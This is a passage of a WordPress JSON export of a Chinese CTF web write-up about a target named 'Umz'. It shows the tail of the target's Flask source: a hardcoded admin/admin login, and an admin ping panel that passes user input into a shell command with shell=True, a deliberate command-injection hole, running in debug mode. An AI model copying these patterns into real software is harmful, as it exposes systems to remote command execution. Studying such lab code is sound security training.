    pre {\n            background: #1e1e1e;\n            color: #d4d4d4;\n            padding: 1rem;\n            border-radius: 4px;\n            overflow-x: auto;\n            margin-top: 2rem;\n        }\n    &lt;\/style&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n    &lt;div class=&quot;console-box&quot;&gt;\n        &lt;h2 class=&quot;header&quot;&gt;System Maintenance Panel&lt;\/h2&gt;\n        &lt;form method=&quot;POST&quot;&gt;\n            &lt;input type=&quot;text&quot; name=&quot;cmd&quot; placeholder=&quot;Enter IP address&quot; required&gt;\n            &lt;button type=&quot;submit&quot;&gt;Execute Ping&lt;\/button&gt;\n        &lt;\/form&gt;\n        {% if output %}\n        &lt;h3&gt;Command Result:&lt;\/h3&gt;\n        &lt;pre&gt;{{ output }}&lt;\/pre&gt;\n        {% endif %}\n    &lt;\/div&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n&#039;&#039;&#039;\n\n@app.route(&#039;\/&#039;, methods=[&#039;GET&#039;])\ndef index():\n    return redirect(&#039;\/login&#039;)\n\n@app.route(&#039;\/login&#039;, methods=[&#039;GET&#039;, &#039;POST&#039;])\ndef login():\n    error = None\n    if request.method == &#039;POST&#039;:\n        if request.form.get(&#039;user&#039;) == &#039;admin&#039; and request.form.get(&#039;pass&#039;) == &#039;admin&#039;:\n            session[&#039;logged_in&#039;] = True\n            session.permanent = True\n            return redirect(&#039;\/admin&#039;)\n        error = True\n    return render_template_string(LOGIN_TEMPLATE, error=error)\n\n@app.route(&#039;\/admin&#039;, methods=[&#039;GET&#039;, &#039;POST&#039;])\ndef admin_panel():\n    if not session.get(&#039;logged_in&#039;):\n        return redirect(&#039;\/login&#039;)\n\n    output = &quot;&quot;\n    if request.method == &#039;POST&#039;:\n        cmd = request.form.get(&#039;cmd&#039;, &#039;&#039;)\n        try:\n            result = subprocess.run(\n                f&quot;ping -c 4 {cmd}&quot;,\n                shell=True,\n                capture_output=True,\n                text=True,\n                timeout=10\n            )\n            output = result.stdout or result.stderr\n        except Exception as e:\n            output = str(e)\n\n    return render_template_string(ADMIN_TEMPLATE, output=output)\n\nif __name__ == &#039;__main__&#039;:\n    app.run(host=&#039;0.0.0.0&#039;, port=8080, debug=True)<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Umz \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Umz] \u2514\u2500$ rustscan  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-913","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/913","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=913"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/913\/revisions"}],"predecessor-version":[{"id":914,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/913\/revisions\/914"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=913"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=913"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=913"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}